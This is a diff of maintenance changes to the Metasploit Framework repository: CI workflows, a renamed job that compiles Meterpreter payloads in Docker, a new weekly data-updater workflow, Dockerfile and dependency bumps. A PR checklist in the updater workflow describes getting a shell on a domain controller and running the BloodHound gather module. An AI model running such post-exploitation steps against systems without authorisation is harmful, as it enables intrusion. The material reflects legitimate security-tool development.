Fix 404 link in eicar.txt (#19912 )

Updated the link to EICAR's test-file as the old one returns 404
correct password in hashes table (#19911 )
2025-02-27 16:17:10 +00:00 · 2025-02-27 15:15:45 +00:00 · 2025-02-27 14:35:25 +00:00 · 2025-02-27 15:28:27 +01:00 · 2025-02-27 15:25:50 +01:00 · 2025-02-27 03:33:05 -06:00
544 changed files with 59519 additions and 9616 deletions
@@ -66,7 +66,7 @@ jobs:
          - windows-2019
          - ubuntu-20.04
        ruby:
-          - 3.1.5
+          - '3.2'
        include:
          # Powershell
          - { command_shell: { name: powershell }, os: windows-2019 }
@@ -32,7 +32,7 @@ jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -44,7 +44,7 @@ on:
 jobs:
  ldap:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -29,7 +29,7 @@ on:
 jobs:
  msftidy:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    env:
      BUNDLE_WITHOUT: "coverage development pcap"
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -44,7 +44,7 @@ on:
 jobs:
  mssql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mssql:
@@ -44,7 +44,7 @@ on:
 jobs:
  mysql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mysql:
@@ -44,7 +44,7 @@ on:
 jobs:
  postgres:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -54,7 +54,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: password
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -30,11 +30,11 @@ on:
        type: boolean

 jobs:
-  # Compile Java Meterpreter via docker if required, we can't always do this on the
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
  # host environment (i.e. for macos). So it instead gets compiled first on a linux
  # host, then the artifacts are copied back to the host later
-  java_meterpreter_compilation:
-    name: Compile Java Meterpreter
+  meterpreter_compilation:
+    name: Compile Meterpreter
    runs-on: ubuntu-latest
    if: ${{ inputs.build_metasploit_payloads }}

@@ -46,21 +46,22 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Build Java and Android payloads
+      - name: Build Meterpreter payloads
        run: |
-          mkdir $(pwd)/java-artifacts
-          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "set -x && cd metasploit-payloads/java && mvn package -Dandroid.sdk.path=/usr/local/android-sdk -Dandroid.release=true -Ddeploy.path=../../java-artifacts -Dmaven.test.skip=true -P deploy && mvn -Dmaven.test.skip=true -Ddeploy.path=../../java-artifacts -P deploy package"
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts

-      - name: Store Java artifacts
+      - name: Store Meterpreter artifacts
        uses: actions/upload-artifact@v4
        with:
-          name: java-artifacts
-          path: java-artifacts
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts

  # Run all test individually, note there is a separate final job for aggregating the test results
  test:
-    needs: java_meterpreter_compilation
-    if: always() && (needs.java_meterpreter_compilation.result == 'success' || needs.java_meterpreter_compilation.result == 'skipped')
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')

    strategy:
      fail-fast: false
@@ -70,7 +71,7 @@ jobs:
          - windows-2019
          - ubuntu-20.04
        ruby:
-          - 3.1.5
+          - '3.2'
        meterpreter:
          # Python
          - { name: python, runtime_version: 3.6 }
@@ -208,28 +209,28 @@ jobs:
        working-directory: metasploit-framework

      - uses: actions/download-artifact@v4
-        name: Download Java meterpreter
-        id: download_java_meterpreter
-        if: ${{ matrix.meterpreter.name == 'java' && inputs.build_metasploit_payloads }}
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
        with:
          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
          path: raw-data

-      - name: Extract Java Meterpreter (Unix)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=${{steps.download_java_meterpreter.outputs.download-path}}
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

-      - name: Extract Java Meterpreter (Windows)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=$(cygpath -u '${{steps.download_java_meterpreter.outputs.download-path}}')
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

      - name: Install mettle gem
        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
@@ -250,32 +251,6 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Get metasploit-payloads version
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: metasploit-payloads
-
-      - name: Build metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: gem build ./gem/metasploit-payloads.gemspec
-        working-directory: metasploit-payloads
-
-      - name: Copy metasploit-payloads gem into metasploit-framework
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: cp ../metasploit-payloads/metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem .
-        working-directory: metasploit-framework
-
-      - name: Install metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: |
-          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
-          bundle config unset deployment
-          bundle update metasploit-payloads
-          bundle install
-        working-directory: metasploit-framework
-
      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
        shell: cmd
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
@@ -294,12 +269,39 @@ jobs:
          make.bat
        working-directory: metasploit-payloads

-      - name: Build PHP, Python and Windows payloads
-        if: ${{ (matrix.meterpreter.name == 'php' || matrix.meterpreter.name == 'python' || runner.os == 'Windows') && inputs.build_metasploit_payloads }}
-        run: |
-          make install-php install-python install-windows
+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
        working-directory: metasploit-payloads

+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
@@ -17,7 +17,7 @@ on:
 jobs:
  smb:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -29,7 +29,7 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60
    name: Docker Build
    steps:
      - name: Checkout code
@@ -41,7 +41,7 @@ jobs:

  test:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -51,7 +51,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: postgres
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -60,16 +60,15 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
          - '3.2'
          - '3.3'
-          - '3.4.0-preview1'
+          - '3.4'
        os:
          - ubuntu-20.04
          - ubuntu-latest
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -17,6 +17,7 @@ todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
 dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
+msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -121,6 +122,7 @@ m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
 Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
 Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
+mwalas-r7 <mwalas-r7@github>           <marcin_walas@rapid7.com>
 net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
@@ -185,4 +187,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -1 +1 @@
-3.1.5
+3.2.5
@@ -1,4 +1,4 @@
-FROM ruby:3.1.6-alpine3.20 AS builder
+FROM ruby:3.2.5-alpine3.20 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -53,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.5-alpine3.18
+FROM ruby:3.2.5-alpine3.20
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -65,8 +65,8 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+RUN apk add --no-cache curl bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python3 py3-pip py3-impacket py3-requests ncurses libcap su-exec alpine-sdk \
    openssl-dev nasm
 RUN\
    if [ "${TARGETARCH}" = "arm64" ];\
@@ -74,7 +74,6 @@ RUN\
    else apk add --no-cache mingw-w64-gcc;\
    fi

-
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

@@ -86,9 +85,6 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
-RUN pip install impacket
-RUN pip install requests

 ENV GOPATH=$TOOLS_HOME/go
 ENV GOROOT=$TOOLS_HOME/bin/go
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.34)
+    metasploit-framework (6.4.52)
      aarch64
      abbrev
      actionpack (~> 7.0.0)
@@ -15,10 +15,12 @@ PATH
      base64
      bcrypt
      bcrypt_pbkdf
+      benchmark
      bigdecimal
      bootsnap
      bson
      chunky_png
+      concurrent-ruby (= 1.3.4)
      csv
      dnsruby
      drb
@@ -31,6 +33,7 @@ PATH
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
+      fiddle
      filesize
      getoptlong
      hrr_rb_ssh-ed25519
@@ -42,7 +45,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.187)
+      metasploit-payloads (= 2.0.189)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.35)
      mqtt
@@ -60,6 +63,7 @@ PATH
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
+      ostruct
      packetfu
      patch_finder
      pcaprub
@@ -186,6 +190,7 @@ GEM
    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
+    benchmark (0.4.0)
    bigdecimal (3.1.8)
    bindata (2.4.15)
    bootsnap (1.18.4)
@@ -200,7 +205,7 @@ GEM
    crass (1.0.6)
    csv (3.3.0)
    daemons (1.4.1)
-    date (3.3.4)
+    date (3.4.1)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
@@ -242,6 +247,7 @@ GEM
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
    getoptlong (0.2.1)
@@ -300,8 +306,8 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.187)
-    metasploit_data_models (6.0.5)
+    metasploit-payloads (2.0.189)
+    metasploit_data_models (6.0.6)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -317,7 +323,7 @@ GEM
      logger
      mime-types-data (~> 3.2015)
    mime-types-data (3.2024.1001)
-    mini_portile2 (2.8.7)
+    mini_portile2 (2.8.8)
    minitest (5.25.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
@@ -340,7 +346,7 @@ GEM
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.16.7)
+    nokogiri (1.18.2)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
@@ -351,6 +357,7 @@ GEM
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.26.3)
@@ -439,14 +446,15 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.12)
+    rex-random_identifier (0.1.13)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.57)
+    rex-socket (0.1.58)
+      dnsruby
      rex-core
    rex-sslscan (0.1.10)
      rex-core
@@ -499,11 +507,11 @@ GEM
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.10)
+    ruby_smb (3.3.13)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
-      rubyntlm
+      rubyntlm (>= 0.6.5)
      windows_error (>= 0.1.4)
    rubyntlm (0.6.5)
      base64
@@ -2,34 +2,35 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.0.8.4, MIT
-actionview, 7.0.8.4, MIT
-activemodel, 7.0.8.4, MIT
-activerecord, 7.0.8.4, MIT
-activesupport, 7.0.8.4, MIT
-addressable, 2.8.6, "Apache 2.0"
+actionpack, 7.0.8.6, MIT
+actionview, 7.0.8.6, MIT
+activemodel, 7.0.8.6, MIT
+activerecord, 7.0.8.6, MIT
+activesupport, 7.0.8.6, MIT
+addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
 allure-rspec, 2.24.5, "Apache 2.0"
 allure-ruby-commons, 2.24.5, "Apache 2.0"
-arel-helpers, 2.14.0, MIT
+arel-helpers, 2.15.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.941.0, "Apache 2.0"
-aws-sdk-core, 3.197.0, "Apache 2.0"
-aws-sdk-ec2, 1.460.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.41.0, "Apache 2.0"
-aws-sdk-iam, 1.99.0, "Apache 2.0"
-aws-sdk-kms, 1.83.0, "Apache 2.0"
-aws-sdk-s3, 1.152.0, "Apache 2.0"
-aws-sdk-ssm, 1.170.0, "Apache 2.0"
-aws-sigv4, 1.8.0, "Apache 2.0"
+aws-partitions, 1.999.0, "Apache 2.0"
+aws-sdk-core, 3.211.0, "Apache 2.0"
+aws-sdk-ec2, 1.486.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
+aws-sdk-iam, 1.112.0, "Apache 2.0"
+aws-sdk-kms, 1.95.0, "Apache 2.0"
+aws-sdk-s3, 1.169.0, "Apache 2.0"
+aws-sdk-ssm, 1.183.0, "Apache 2.0"
+aws-sigv4, 1.10.1, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
+benchmark, 0.4.0, "ruby, Simplified BSD"
 bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.18.3, MIT
-bson, 5.0.0, "Apache 2.0"
+bootsnap, 1.18.4, MIT
+bson, 5.0.1, "Apache 2.0"
 builder, 3.3.0, MIT
 bundler, 2.5.10, MIT
 byebug, 11.1.3, "Simplified BSD"
@@ -40,27 +41,28 @@ cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.4, "ruby, Simplified BSD"
+date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.72.1, "Apache 2.0"
-docile, 1.4.0, MIT
+dnsruby, 1.72.2, "Apache 2.0"
+docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
-elftools, 1.2.0, MIT
+elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
-em-socksify, 0.3.2, MIT
+em-socksify, 0.3.3, MIT
 erubi, 1.13.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.4.6, MIT
-factory_bot_rails, 6.4.3, MIT
-faker, 3.4.1, MIT
+factory_bot, 6.5.0, MIT
+factory_bot_rails, 6.4.4, MIT
+faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 getoptlong, 0.2.1, "ruby, Simplified BSD"
@@ -69,151 +71,152 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.6, MIT
+http-cookie, 1.0.7, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.5, MIT
+i18n, 1.14.6, MIT
 io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.7.2, ruby
+json, 2.7.5, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
+logger, 1.6.1, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.22.0, MIT
+loofah, 2.23.1, MIT
 macaddr, 1.7.2, ruby
-memory_profiler, 1.0.1, MIT
+memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.9, "New BSD"
-metasploit-framework, 6.4.34, "New BSD"
+metasploit-concern, 5.0.3, "New BSD"
+metasploit-credential, 6.0.11, "New BSD"
+metasploit-framework, 6.4.52, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.186, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.3, "New BSD"
+metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.6, "New BSD"
 metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.5.2, MIT
-mime-types-data, 3.2024.0604, MIT
-mini_portile2, 2.8.7, MIT
+mime-types, 3.6.0, MIT
+mime-types-data, 3.2024.1001, MIT
+mini_portile2, 2.8.8, MIT
 minitest, 5.25.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 3.0.0, MIT
+mustermann, 3.0.3, MIT
 mutex_m, 0.2.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.12, "ruby, Simplified BSD"
+net-imap, 0.5.0, "ruby, Simplified BSD"
 net-ldap, 0.19.0, MIT
 net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
 net-smtp, 0.5.0, "ruby, Simplified BSD"
-net-ssh, 7.2.3, MIT
+net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.7.3, "MIT, Simplified BSD"
-nokogiri, 1.16.7, MIT
-nori, 2.7.0, MIT
+nio4r, 2.7.4, "MIT, Simplified BSD"
+nokogiri, 1.18.2, MIT
+nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
-parallel, 1.24.0, MIT
-parser, 3.3.2.0, MIT
+parallel, 1.26.3, MIT
+parser, 3.3.5.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.12.0, MIT
-pg, 1.5.6, "Simplified BSD"
+pg, 1.5.9, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.5, MIT
-puma, 6.4.2, "New BSD"
+public_suffix, 6.0.1, MIT
+puma, 6.4.3, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.9, MIT
+rack, 2.2.10, MIT
 rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.4, MIT
+railties, 7.0.8.6, MIT
 rainbow, 3.1.1, MIT
 rake, 13.2.1, MIT
 rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.5, unknown
+recog, 3.1.11, unknown
 redcarpet, 3.6.0, MIT
 regexp_parser, 2.9.2, MIT
-reline, 0.5.8, ruby
+reline, 0.5.10, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.16, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
 rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
